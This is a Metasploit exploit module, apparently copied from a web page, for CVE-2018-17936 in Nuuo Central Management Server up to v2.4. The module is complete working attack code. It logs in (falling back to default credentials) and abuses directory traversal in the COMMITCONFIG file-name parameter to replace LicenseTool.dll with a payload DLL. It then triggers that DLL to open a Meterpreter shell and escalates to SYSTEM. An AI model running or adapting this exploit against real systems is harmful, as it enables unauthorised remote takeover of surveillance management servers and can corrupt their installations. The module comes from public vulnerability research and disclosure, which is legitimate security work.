Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ManualRanking
8

9
  include Msf::Exploit::EXE
10
  include Msf::Exploit::Remote::Nuuo
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload",
17
        'Description' => %q{
18
          The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the
19
          CMS Server.
20
          The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\..\)
21
          characters. Therefore, this function can be abused to overwrite any files in the installation
22
          drive of CMS Server.
23

24
          This vulnerability is exploitable in CMS versions up to and including v2.4.
25

26
          This module will either use a provided session number (which can be guessed with an auxiliary
27
          module) or attempt to login using a provided username and password - it will also try the
28
          default credentials if nothing is provided.
29

30
          This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module
31
          fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will
32
          not execute successfully.
33
        },
34
        'License' => MSF_LICENSE,
35
        'Author' => [
36
          'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module
37
        ],
38
        'References' => [
39
          [ 'CVE', '2018-17936' ],
40
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
41
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
42
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt' ]
43
        ],
44
        'Platform' => 'win',
45
        'Arch' => ARCH_X86,
46
        'Targets' => [
47
          [ 'Nuuo Central Management Server <= v2.4.0', {} ],
48
        ],
49
        'Privileged' => true,
50
        'DisclosureDate' => '2018-10-11',
51
        'DefaultTarget' => 0,
52
        'Compat' => {
53
          'Meterpreter' => {
54
            'Commands' => %w[
55
              stdapi_sys_process_execute
56
              stdapi_sys_process_get_processes
57
              stdapi_sys_process_kill
58
            ]
59
          }
60
        }
61
      )
62
    )
63

64
    self.needs_cleanup = true
65
  end
66

67
  def on_new_session(client)
68
    if client.type == 'meterpreter'
69
      print_warning('Please wait a bit while we clean up')
70
      client.sys.process.get_processes().each do |proc|
71
        if proc['name'] == 'NCS_Server.exe'
72
          client.sys.process.kill(proc['pid'])
73
          Rex.sleep(5)
74
          client.shell_command_token("move /y #{@dll} LicenseTool.dll")
75
          client.sys.process.execute('NCS_Server.exe')
76
          print_good('Successfully restored LicenseTool.dll!')
77
        end
78
      end
79

80
      # elevate privs to system (we're already Admin anyway), and we're done!
81
      client.run_cmd('getsystem')
82
      print_good('We should have SYSTEM now, enjoy your shell!')
83
    else
84
      print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll')
85
      print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
86
      print_error('... otherwise the Nuuo CMS installation will be nuked!')
87
      print_good('Anyway, enjoy your shell!')
88
    end
89
  end
90

91
  def upload_file(filename, data)
92
    res = ncs_send_request({
93
      'method' => 'COMMITCONFIG',
94
      'file_name' => "..\\..\\#{filename}",
95
      'user_session' => user_session,
96
      'data' => data
97
    })
98
  end
99

100
  def exploit
101
    connect
102
    res = ncs_login
103
    fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') unless res
104

105
    # Download and upload a backup of LicenseTool.dll, so that we can restore it at post
106
    # and not nuke the CMS installation.
107
    @dll = rand_text_alpha(12)
108
    print_status("Backing up LicenseTool.dll to #{@dll}")
109

110
    ltool = 'LicenseTool.dll'
111
    res = ncs_send_request({
112
      'method' => 'GETCONFIG',
113
      'file_name' => "..\\..\\#{ltool}",
114
      'user_session' => user_session
115
    })
116
    dll_data = res.body
117

118
    upload_file(@dll, dll_data)
119

120
    print_status('Uploading payload...')
121
    upload_file(ltool, generate_payload_dll)
122

123
    print_status('Sleeping 15 seconds...')
124
    Rex.sleep(15)
125

126
    print_status('Sending SENDLICFILE request, shell incoming!')
127
    res = ncs_send_request({
128
      'method' => 'SENDLICFILE',
129
      'file_name' => "#{rand_text_alpha(3..11)}.lic",
130
      'user_session' => user_session,
131
      'data' => rand_text_alpha(50..350)
132
    })
133
  end
134
end
135

136